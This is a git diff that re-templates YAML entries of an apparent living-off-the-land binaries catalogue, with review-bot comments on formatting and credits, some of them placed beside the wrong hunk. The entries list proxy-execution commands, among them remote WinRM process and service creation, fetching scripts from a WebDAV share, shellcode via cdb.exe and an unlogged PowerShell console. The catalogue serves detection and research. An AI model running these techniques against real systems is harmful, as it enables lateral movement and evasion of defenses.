b/yml/OSScripts/Winrm.yml index d4329dd..e35ab68 100644 --- a/yml/OSScripts/Winrm.yml +++ b/yml/OSScripts/Winrm.yml 
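Review bot: The `Name:` field is changed to `Syncappvpublishingserver.vbs` while the Full Path on the same hunk keeps `SyncAppvPublishingServer.vbs`; Winrm.yml in this commit likewise lowercases its name to `winrm.vbs` although every other entry keeps the on-disk capitalisation. Since Name is presumably what the generator prints as the page title, keep the casing used in Full Path, `Name: SyncAppvPublishingServer.vbs`. The new Description, "Script used related to app-v and publishing server", also reads awkwardly; something like `Description: Script related to App-V and its publishing server` says the same thing more clearly.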
@@ -1,28 +1,54 @@ --- -Name: Winrm.vbs -Description: Execute -Author: '' +Name: winrm.vbs +Description: Script used for manage Windows RM settings +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: reg.exe import c:\path\to\Slmgr.reg & winrm quickconfig Description: Hijack the Scripting.Dictionary COM Object to execute remote scriptlet (SCT) code. - - Command: winrm invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -r:http://target:5985 - Description: Lateral movement/Remote Command Execution via WMI Win32_Process class over the WinRM protocol. - - Command: winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 \nwinrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985 - Description: Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol. + Usecase: Proxy execution + Category: Execute + Privileges: User + MitreID: T1216 + MitreLink: https://attack.mitre.org/wiki/Technique/T1216 + OperatingSystem: Windows 10 + - Command: 'winrm invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -r:http://target:5985' + Description: Lateral movement/Remote Command Execution via WMI Win32_Process class over the WinRM protocol + Usecase: Proxy execution + Category: Execute + Privileges: User + MitreID: T1216 + MitreLink: https://attack.mitre.org/wiki/Technique/T1216 + OperatingSystem: Windows 10 + - Command: 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 \nwinrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985' + Description: Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol + Usecase: Proxy execution + Category: Execute + Privileges: User + MitreID: T1216 + MitreLink: 
https://attack.mitre.org/wiki/Technique/T1216 + OperatingSystem: Windows 10 Full Path: - - C:\windows\system32\winrm.vbs - - C:\windows\SysWOW64\winrm.vbs -Code Sample: - - https://github.com/api0cradle/LOLBAS/blob/master/OSScripts/Payload/Slmgr.reg - - https://github.com/api0cradle/LOLBAS/blob/master/OSScripts/Payload/Slmgr_calc.sct -Detection: [] + - Path: C:\Windows\System32\winrm.vbs + - Path: C:\Windows\SysWOW64\winrm.vbs +Code Sample: + - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr.reg + - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr_calc.sct +Detection: + - IOC: Resources: - - https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology - - https://www.youtube.com/watch?v=3gz1QmiMhss - - https://github.com/enigma0x3/windows-operating-system-archaeology - - https://redcanary.com/blog/lateral-movement-winrm-wmi/ - - https://twitter.com/bohops/status/994405551751815170 -Notes: Thanks to Matt Nelson - @enigma0x3 (Hijack), Casey Smith - @subtee (Hijack), Red Canary Company cc Tony Lambert - @redcanaryco (Win32_Process LM), Jimmy - @bohops (Win32_Service LM) - + - Link: https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology + - Link: https://www.youtube.com/watch?v=3gz1QmiMhss + - Link: https://github.com/enigma0x3/windows-operating-system-archaeology + - Link: https://redcanary.com/blog/lateral-movement-winrm-wmi/ + - Link: https://twitter.com/bohops/status/994405551751815170 +Acknowledgement: + - Person: Matt Nelson + Handle: '@enigma0x3' + - Person: Casey Smith + Handle: '@subtee' + - Person: Jimmy + Handle: '@bohops' + - Person: Red Canary Company cc Tony Lambert + Handle: '@redcanaryco' +--- \ No newline at end of file diff --git a/yml/OSScripts/pester.yml b/yml/OSScripts/pester.yml index 640b59f..9dbc7cd 100644 --- a/yml/OSScripts/pester.yml +++ b/yml/OSScripts/pester.yml 
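Review bot: `- IOC:` is left empty even though this file now documents two remote-execution commands whose `-r:http://...:5985` argument is an obvious thing for a defender to look for; a line such as `- IOC: winrm.vbs invoked with a -r: argument pointing at another host` would give the Detection section something to render. The new Description, "Script used for manage Windows RM settings", should read `Script used to manage WinRM settings`. Style nit on the three Description lines: the first keeps its trailing period while the two rewritten ones drop theirs.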
@@ -1,18 +1,27 @@ --- -Name: pester.bat -Description: Execute code using Pester. The third parameter can be anything. The fourth is the payload. -Author: '' +Name: Pester.bat +Description: Used as part of the Powershell pester +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - - Command: Pester.bat [/help|?|-?|/?] "$null; notepad" - Description: Execute notepad + - Command: Pester.bat [/help|?|-?|/?] "$null; notepad" + Description: Execute code using Pester. The third parameter can be anything. The fourth is the payload. Example here executes notepad + Usecase: Proxy execution + Category: Execute + Privileges: User + MitreID: T1216 + MitreLink: https://attack.mitre.org/wiki/Technique/T1216 + OperatingSystem: Windows 10 Full Path: - - c:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat - - c:\Program Files\WindowsPowerShell\Modules\Pester\*\bin\Pester.bat -Code Sample: [] -Detection: [] + - Path: c:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat + - Path: c:\Program Files\WindowsPowerShell\Modules\Pester\*\bin\Pester.bat +Code Sample: + - Code: +Detection: + - IOC: Resources: - - https://twitter.com/Oddvarmoe/status/993383596244258816 - - https://github.com/api0cradle/LOLBAS/blob/master/OSScripts/pester.md -Notes: Thanks to Emin Atac - @p0w3rsh3ll + - Link: https://twitter.com/Oddvarmoe/status/993383596244258816 +Acknowledgement: + - Person: Emin Atac + Handle: '@p0w3rsh3ll' +--- \ No newline at end of file diff --git a/yml/OtherMSBinaries/Appvlp.yml b/yml/OtherMSBinaries/Appvlp.yml index e09d706..a6746b2 100644 --- a/yml/OtherMSBinaries/Appvlp.yml +++ b/yml/OtherMSBinaries/Appvlp.yml @@ -7,7 +7,7 @@ Commands: - Command: AppVLP.exe \\webdav\calc.bat Usecase: Execution of BAT file hosted on Webdav server. Description: Executes calc.bat through AppVLP.exe - Category: Execution + Category: Execute Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 
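Review bot: The Resources rewrite keeps the tweet but silently drops the `pester.md` link that was on the removed side; if the drop is deliberate because that page moved with the repository, the replacement under the LOLBAS-Project repository the other hunks link to should be added as a `- Link:` entry instead. The new Description, "Used as part of the Powershell pester", is also unclear on its own; `Description: Batch file shipped with the Pester PowerShell module` states the same thing without ambiguity.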
@@ -15,7 +15,7 @@ Commands: - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)" Usecase: Local execution of process bypassing Attack Surface Reduction (ASR). Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command. - Category: Execution + Category: Execute Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 
@@ -23,21 +23,23 @@ Commands: - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')" Usecase: Local execution of process bypassing Attack Surface Reduction (ASR). Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command. - Category: Execution + Category: Execute Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows 10 w/Office 2016 Full Path: - - C:\Program Files\Microsoft Office\root\client\appvlp.exe - - C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe -Code Sample: [] -Detection: [] + - Path: C:\Program Files\Microsoft Office\root\client\appvlp.exe + - Path: C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe +Code Sample: + - Code: +Detection: + - IOC: Resources: - - https://github.com/MoooKitty/Code-Execution - - https://twitter.com/moo_hax/status/892388990686347264 - - https://enigma0x3.net/2018/06/11/the-tale-of-settingcontent-ms-files/ - - https://securityboulevard.com/2018/07/attackers-test-new-document-attack-vector-that-slips-past-office-defenses/ + - Link: https://github.com/MoooKitty/Code-Execution + - Link: https://twitter.com/moo_hax/status/892388990686347264 + - Link: https://enigma0x3.net/2018/06/11/the-tale-of-settingcontent-ms-files/ + - Link: https://securityboulevard.com/2018/07/attackers-test-new-document-attack-vector-that-slips-past-office-defenses/ Acknowledgement: - Person: fab Handle: '@0rbz_' @@ -45,3 +47,4 @@ Acknowledgement: Handle: '@moo_hax' - Person: Matt Wilson Handle: '@enigma0x3' +--- diff --git a/yml/OtherMSBinaries/Bginfo.yml b/yml/OtherMSBinaries/Bginfo.yml index 41a53f3..e82b02f 100644 --- a/yml/OtherMSBinaries/Bginfo.yml +++ b/yml/OtherMSBinaries/Bginfo.yml 
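Review bot: The `+---` appended as the last line of the file is a YAML document-start marker, not an end marker, so a parser run in multi-document mode will yield a second, empty (null) document after this one; the same trailer is added to every file in this commit. If the intent is to mark the end of the document, `...` is the end-of-document marker; if it is only a visual separator for the management script, confirm that the PowerShell YAML parser it uses ignores the trailing null document rather than emitting an empty entry. In the same hunk, the context lines credit `Person: Matt Wilson` with `Handle: '@enigma0x3'`, while the Winrm hunk above credits the same handle as `Matt Nelson` — one of the two names is wrong and should be corrected while the file is being re-templated.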
@@ -29,13 +29,14 @@ Commands: MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows Full Path: - - No fixed path + - Path: No fixed path Code Sample: - Code: Detection: - IOC: Resources: - - https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/ + - Link: https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/ Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' +--- \ No newline at end of file diff --git a/yml/OtherMSBinaries/Cdb.yml b/yml/OtherMSBinaries/Cdb.yml index 399037f..e0f7fcc 100644 --- a/yml/OtherMSBinaries/Cdb.yml +++ b/yml/OtherMSBinaries/Cdb.yml @@ -7,20 +7,23 @@ Commands: - Command: cdb.exe -cf x64_calc.wds -o notepad.exe Description: Launch 64-bit shellcode from the x64_calc.wds file using cdb.exe. Usecase: Local execution of assembly shellcode. - Category: Execution + Category: Execute Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows Full Path: - - C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe - - C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe -Code Sample: [] -Detection: [] + - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe + - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe +Code Sample: + - Code: +Detection: + - IOC: Resources: - - http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html - - https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options - - https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda + - Link: http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html + - Link: https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options + - Link: https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda Acknoledgement: - Person: Matt Graeber Handle: '@mattifestation' +--- \ No newline at end of file 
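Review bot: `+ - Path: No fixed path` puts a free-text sentence into a field the other files treat as a file path, and this commit ends up with three different spellings for the same condition — `No fixed path` here, `N/A` in Dnx.yml, and an empty `- Path:` in Msxsl.yml, Rcsi.yml, Te.yml and Tracker.yml — so the generated pages will render the "unknown location" case three ways and anything filtering on `Path` will have to special-case each. Pick one convention (an empty `- Path:` is the one the template already uses for `Code:` and `IOC:`) and, if the fact that bginfo.exe has no fixed install location is worth recording, put it in the command `Description` rather than in the path field.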
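Review bot: The context key `Acknoledgement:` is misspelled, so anything reading the `Acknowledgement` key that every other re-templated file in this commit uses (pester.yml, Appvlp.yml, Csi.yml, Dnx.yml, …) will find nothing here and Matt Graeber's credit will silently drop out of the generated page; rename it to `Acknowledgement:`. Te.yml (`Acknowlegement:`) and Tracker.yml (`Acknowledgment:`) carry the same class of typo, so a single pass over the key name across the directory is worthwhile while the template is being standardised.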
diff --git a/yml/OtherMSBinaries/Csi.yml b/yml/OtherMSBinaries/Csi.yml index 3a3744b..0e90270 100644 --- a/yml/OtherMSBinaries/Csi.yml +++ b/yml/OtherMSBinaries/Csi.yml @@ -7,19 +7,22 @@ Commands: - Command: csi.exe file Description: Use csi.exe to run unsigned C# code. Usecase: Local execution of unsigned C# code. - Category: Execution + Category: Execute Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows Full Path: - - c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe - - c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe -Code Sample: [] -Detection: [] + - Path: c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe + - Path: c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe +Code Sample: + - Code: +Detection: + - IOC: Resources: - - https://twitter.com/subTee/status/781208810723549188 - - https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/ + - Link: https://twitter.com/subTee/status/781208810723549188 + - Link: https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/ Acknowledgement: - Person: Casey Smith Handle: '@subtee' +--- diff --git a/yml/OtherMSBinaries/Dnx.yml b/yml/OtherMSBinaries/Dnx.yml index 5d5a53c..68ab14d 100644 --- a/yml/OtherMSBinaries/Dnx.yml +++ b/yml/OtherMSBinaries/Dnx.yml 
@@ -7,18 +7,20 @@ Commands: - Command: dnx.exe consoleapp Description: Execute C# code located in the consoleapp folder via 'Program.cs' and 'Project.json' (Note - Requires dependencies) Usecase: Local execution of C# project stored in consoleapp folder. - Category: Execution + Category: Execute Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows Full Path: - - N/A -Code Sample: [] -Detection: [] + - Path: N/A +Code Sample: + - Code: +Detection: + - IOC: Resources: - - https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/ + - Link: https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/ Acknowledgement: - Person: Matt Nelson Handle: '@enigma0x3' - +--- \ No newline at end of file diff --git a/yml/OtherMSBinaries/Dxcap.yml b/yml/OtherMSBinaries/Dxcap.yml index 2a76f89..0fbbb24 100644 --- a/yml/OtherMSBinaries/Dxcap.yml +++ b/yml/OtherMSBinaries/Dxcap.yml @@ -7,18 +7,21 @@ Commands: - Command: Dxcap.exe -c C:\Windows\System32\notepad.exe Description: Launch notepad as a subprocess of Dxcap.exe Usecase: Local execution of a process as a subprocess of Dxcap.exe - Category: Execution + Category: Execute Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows Full Path: - - c:\Windows\System32\dxcap.exe - - c:\Windows\SysWOW64\dxcap.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\dxcap.exe + - Path: C:\Windows\SysWOW64\dxcap.exe +Code Sample: + - Code: +Detection: + - IOC: Resources: - - https://twitter.com/harr0ey/status/992008180904419328 + - Link: https://twitter.com/harr0ey/status/992008180904419328 Acknowledgement: - Person: Matt harr0ey Handle: '@harr0ey' +--- \ No newline at end of file diff --git a/yml/OtherMSBinaries/Mftrace.yml b/yml/OtherMSBinaries/Mftrace.yml index 527dae1..81bdb98 100644 --- a/yml/OtherMSBinaries/Mftrace.yml +++ b/yml/OtherMSBinaries/Mftrace.yml 
@@ -7,7 +7,7 @@ Commands: - Command: Mftrace.exe cmd.exe Description: Launch cmd.exe as a subprocess of Mftrace.exe. Usecase: Local execution of cmd.exe as a subprocess of Mftrace.exe. - Category: Execution + Category: Execute Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 @@ -15,20 +15,23 @@ Commands: - Command: Mftrace.exe powershell.exe Description: Launch cmd.exe as a subprocess of Mftrace.exe. Usecase: Local execution of powershell.exe as a subprocess of Mftrace.exe. - Category: Execution + Category: Execute Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows Full Path: - - C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x86 - - C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x64 - - C:\Program Files (x86)\Windows Kits\10\bin\x86 - - C:\Program Files (x86)\Windows Kits\10\bin\x64 -Code Sample: [] -Detection: [] + - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x86 + - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x64 + - Path: C:\Program Files (x86)\Windows Kits\10\bin\x86 + - Path: C:\Program Files (x86)\Windows Kits\10\bin\x64 +Code Sample: + - Code: +Detection: + - IOC: Resources: - - https://twitter.com/0rbz_/status/988911181422186496 (Currently not accessible) + - Link: https://twitter.com/0rbz_/status/988911181422186496 Acknowledgement: - Person: fabrizio Handle: '@0rbz_' +--- diff --git a/yml/OtherMSBinaries/Msdeploy.yml b/yml/OtherMSBinaries/Msdeploy.yml index f98f5e0..b180e03 100644 --- a/yml/OtherMSBinaries/Msdeploy.yml +++ b/yml/OtherMSBinaries/Msdeploy.yml 
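Review bot: The second entry's `Description: Launch cmd.exe as a subprocess of Mftrace.exe.` does not match its `Command: Mftrace.exe powershell.exe` (the `Usecase` line directly below already says powershell.exe); change it to `Description: Launch powershell.exe as a subprocess of Mftrace.exe.`. The four `Full Path` entries are directories rather than the binary — every other file in this commit lists the executable itself — so they should end in `\mftrace.exe`, e.g. `- Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x64\mftrace.exe`. The `(Currently not accessible)` caveat on the twitter resource was dropped in the rewrite; if the status is still unreachable, keeping that note (or substituting an archived copy) saves the reader a dead link.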
@@ -7,17 +7,20 @@ Commands: - Command: msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat" Description: Launch calc.bat via msdeploy.exe. Usecase: Local execution of batch file using msdeploy.exe. - Category: Execution + Category: Execute Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows Full Path: - - C:\Program Files (x86)\IIS\Microsoft Web Deploy V3\msdeploy.exe -Code Sample: [] -Detection: [] + - Path: C:\Program Files (x86)\IIS\Microsoft Web Deploy V3\msdeploy.exe +Code Sample: + - Code: +Detection: + - IOC: Resources: - - https://twitter.com/pabraeken/status/995837734379032576 + - Link: https://twitter.com/pabraeken/status/995837734379032576 Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' +--- diff --git a/yml/OtherMSBinaries/Msxsl.yml b/yml/OtherMSBinaries/Msxsl.yml index c6d3d5f..e50007c 100644 --- a/yml/OtherMSBinaries/Msxsl.yml +++ b/yml/OtherMSBinaries/Msxsl.yml @@ -21,10 +21,15 @@ Commands: MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows Full Path: - - '' -Code Sample: [] -Detection: [] + - Path: +Code Sample: + - Code: +Detection: + - IOC: Resources: - - https://twitter.com/subTee/status/877616321747271680 - - https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker -Notes: Thanks to Casey Smith - @subTee (Finding), 3gstudent - @3gstudent (Remote) + - Link: https://twitter.com/subTee/status/877616321747271680 + - Link: https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker +Acknowledgement: + - Person: Casey Smith + Handle: '@subtee' +--- diff --git a/yml/OtherMSBinaries/Rcsi.yml b/yml/OtherMSBinaries/Rcsi.yml index 958d278..1054b60 100644 --- a/yml/OtherMSBinaries/Rcsi.yml +++ b/yml/OtherMSBinaries/Rcsi.yml 
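Review bot: The rewritten `Acknowledgement` keeps only Casey Smith, while the removed `Notes` line also credited `3gstudent - @3gstudent (Remote)`, whose repository is still the second `Resources` link; add `- Person: 3gstudent` / `Handle: '@3gstudent'` so the credit is not lost in the template migration. The `Full Path` is left as an empty `- Path:` — the old value was an empty string too, so this is not a regression, but a blank path is indistinguishable from an omission; if the reason is that msxsl.exe is not shipped with Windows, saying so in the entry's `Description` is more useful than an empty field.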
@@ -12,11 +12,15 @@ Commands: MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows -Full Path: '' -Code Sample: [] -Detection: [] +Full Path: + - Path: +Code Sample: + - Code: +Detection: + - IOC: Resources: - - https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/ + - Link: https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/ Acknowledgement: - Person: Matt Nelson Handle: '@enigma0x3' +--- \ No newline at end of file diff --git a/yml/OtherMSBinaries/Sqldumper.yml b/yml/OtherMSBinaries/Sqldumper.yml index bd4c30c..ebc26a0 100644 --- a/yml/OtherMSBinaries/Sqldumper.yml +++ b/yml/OtherMSBinaries/Sqldumper.yml @@ -21,14 +21,17 @@ Commands: MitreLink: https://attack.mitre.org/wiki/Technique/T1003 OperatingSystem: Windows Full Path: - - C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe - - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis\AS OLEDB\140\SQLDumper.exe -Code Sample: [] -Detection: [] + - Path: C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe + - Path: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis\AS OLEDB\140\SQLDumper.exe +Code Sample: + - Code: +Detection: + - IOC: Resources: - - https://twitter.com/countuponsec/status/910969424215232518 - - https://twitter.com/countuponsec/status/910977826853068800 - - https://support.microsoft.com/en-us/help/917825/how-to-use-the-sqldumper-exe-utility-to-generate-a-dump-file-in-sql-se + - Link: https://twitter.com/countuponsec/status/910969424215232518 + - Link: https://twitter.com/countuponsec/status/910977826853068800 + - Link: https://support.microsoft.com/en-us/help/917825/how-to-use-the-sqldumper-exe-utility-to-generate-a-dump-file-in-sql-se Acknowledgement: - Person: Luis Rocha Handle: '@countuponsec' +--- \ No newline at end of file 
diff --git a/yml/OtherMSBinaries/Sqlps.yml b/yml/OtherMSBinaries/Sqlps.yml index 7c57407..1586ce8 100644 --- a/yml/OtherMSBinaries/Sqlps.yml +++ b/yml/OtherMSBinaries/Sqlps.yml @@ -7,17 +7,20 @@ Commands: - Command: Sqlps.exe -noprofile Description: Drop into a SQL Server PowerShell console without Module and ScriptBlock Logging. Usecase: Execute PowerShell commands without ScriptBlock logging. - Category: Execution + Category: Execute Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows Full Path: - - C:\Program files (x86\Microsoft SQL Server\100\Tools\Binn\sqlps.exe -Code Sample: [] -Detection: [] + - Path: C:\Program files (x86\Microsoft SQL Server\100\Tools\Binn\sqlps.exe +Code Sample: + - Code: +Detection: + - IOC: Resources: - - https://twitter.com/bryon_/status/975835709587075072 + - Link: https://twitter.com/bryon_/status/975835709587075072 Acknowledgement: - Person: Bryon Handle: '@bryon_' +--- \ No newline at end of file diff --git a/yml/OtherMSBinaries/Sqltoolsps.yml b/yml/OtherMSBinaries/Sqltoolsps.yml index 59cbafa..97e379f 100644 --- a/yml/OtherMSBinaries/Sqltoolsps.yml +++ b/yml/OtherMSBinaries/Sqltoolsps.yml 
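Review bot: `+ - Path: C:\Program files (x86\Microsoft SQL Server\100\Tools\Binn\sqlps.exe` is missing the closing parenthesis in `(x86)` — a typo carried over from the removed line rather than introduced here, but the path as written does not exist on any system; change it to `- Path: C:\Program Files (x86)\Microsoft SQL Server\100\Tools\Binn\sqlps.exe`. `Detection` is left as an empty `- IOC:` even though the `Description` states that the point of `-noprofile` here is a PowerShell console without Module and ScriptBlock logging, which is exactly the case defenders want a hint for; an entry such as `- IOC: sqlps.exe process creation on hosts that are not SQL Server administration workstations` would be a reasonable starting point, hedged to whatever the referenced tweet supports.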
@@ -7,17 +7,20 @@ Commands: - Command: SQLToolsPS.exe -noprofile -command Start-Process calc.exe Description: Run PowerShell scripts and commands. Usecase: Execute PowerShell command. - Category: Execution + Category: Execute Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows Full Path: - - C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe -Code Sample: [] -Detection: [] + - Path: C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe +Code Sample: + - Code: +Detection: + - IOC: Resources: - - https://twitter.com/pabraeken/status/993298228840992768 + - Link: https://twitter.com/pabraeken/status/993298228840992768 Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' +--- \ No newline at end of file diff --git a/yml/OtherMSBinaries/Te.yml b/yml/OtherMSBinaries/Te.yml index ce3871c..7a71d43 100644 --- a/yml/OtherMSBinaries/Te.yml +++ b/yml/OtherMSBinaries/Te.yml @@ -7,16 +7,20 @@ Commands: - Command: te.exe bypass.wsc Description: Run COM Scriptlets (e.g. VBScript) by calling a Windows Script Component (WSC) file. Usecase: Execute Visual Basic script stored in local Windows Script Component file. - Category: Execution + Category: Execute Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows -Full Path: '' -Code Sample: [] -Detection: [] +Full Path: + - Path: +Code Sample: + - Code: +Detection: + - IOC: Resources: - - https://twitter.com/gn3mes1s/status/927680266390384640?lang=bg + - Link: https://twitter.com/gn3mes1s/status/927680266390384640?lang=bg Acknowlegement: - Person: Giuseppe N3mes1s Handle: '@gN3mes1s' +--- diff --git a/yml/OtherMSBinaries/Tracker.yml b/yml/OtherMSBinaries/Tracker.yml index ba7c208..014ac44 100644 --- a/yml/OtherMSBinaries/Tracker.yml +++ b/yml/OtherMSBinaries/Tracker.yml 
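Review bot: The only `Full Path` entry, `+ - Path: C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe`, names sqlps.exe, but this file documents `SQLToolsPS.exe` (see the `Command` line), so the path does not point at the binary being described; it should end in `\SQLToolsPS.exe` unless the 130 toolset really ships it under the old name, in which case the `Description` should say so. Note also that Sqlps.yml in this same commit points at `100\Tools\Binn\sqlps.exe`, so if this path is kept as-is the two files disagree about where sqlps.exe lives.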
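Review bot: The context key `Acknowlegement:` is misspelled (Cdb.yml has `Acknoledgement:` and Tracker.yml `Acknowledgment:`, against `Acknowledgement:` everywhere else in this commit), so a generator keyed on the canonical name will drop Giuseppe N3mes1s's credit from this page; rename it to `Acknowledgement:` while the file is being re-templated. The empty `+ - Path:` is carried over from the old `Full Path: ''`, so it is not a regression, but a blank path reads as an omission; if the install location is simply unknown, say so in the `Description`.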
@@ -12,12 +12,16 @@ Commands: MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows -Full Path: '' -Code Sample: [] -Detection: [] +Full Path: + - Path: +Code Sample: + - Code: +Detection: + - IOC: Resources: - - https://twitter.com/subTee/status/793151392185589760 - - https://attack.mitre.org/wiki/Execution + - Link: https://twitter.com/subTee/status/793151392185589760 + - Link: https://attack.mitre.org/wiki/Execution Acknowledgment: - Person: Casey Smith Handle: '@subTee' +--- diff --git a/yml/OtherMSBinaries/Vsjitdebugger.yml b/yml/OtherMSBinaries/Vsjitdebugger.yml index a1cb5c6..2f8b912 100644 --- a/yml/OtherMSBinaries/Vsjitdebugger.yml +++ b/yml/OtherMSBinaries/Vsjitdebugger.yml @@ -1,23 +1,26 @@ --- Name: vsjitdebugger.exe -Description: Just-In-Time (JIT) debugger included with Visual Studio.. +Description: Just-In-Time (JIT) debugger included with Visual Studio Author: 'Oddvar Moe' Created: '2018-05-25' Commands: - Command: Vsjitdebugger.exe calc.exe Description: Executes calc.exe as a subprocess of Vsjitdebugger.exe. Usecase: Execution of local PE file as a subprocess of Vsjitdebugger.exe. - Category: Execution + Category: Execute Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows Full Path: - - c:\windows\system32\vsjitdebugger.exe -Code Sample: [] -Detection: [] + - Path: c:\windows\system32\vsjitdebugger.exe +Code Sample: + - Code: +Detection: + - IOC: Resources: - - https://twitter.com/pabraeken/status/990758590020452353 + - Link: https://twitter.com/pabraeken/status/990758590020452353 Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' +--- diff --git a/yml/OtherMSBinaries/Winword.yml b/yml/OtherMSBinaries/Winword.yml index 9094ad1..0e60895 100644 --- a/yml/OtherMSBinaries/Winword.yml +++ b/yml/OtherMSBinaries/Winword.yml 
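Review bot: The context key `Acknowledgment:` uses a different spelling from the `Acknowledgement:` key the rest of the commit standardises on, so a generator reading the canonical name will drop Casey Smith's credit here; rename it to `Acknowledgement:`. The second resource, `+ - Link: https://attack.mitre.org/wiki/Execution`, is the generic tactic page rather than a source for this technique, and `MitreLink` already carries the technique reference — consider dropping it or pointing at the specific write-up the tweet refers to.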
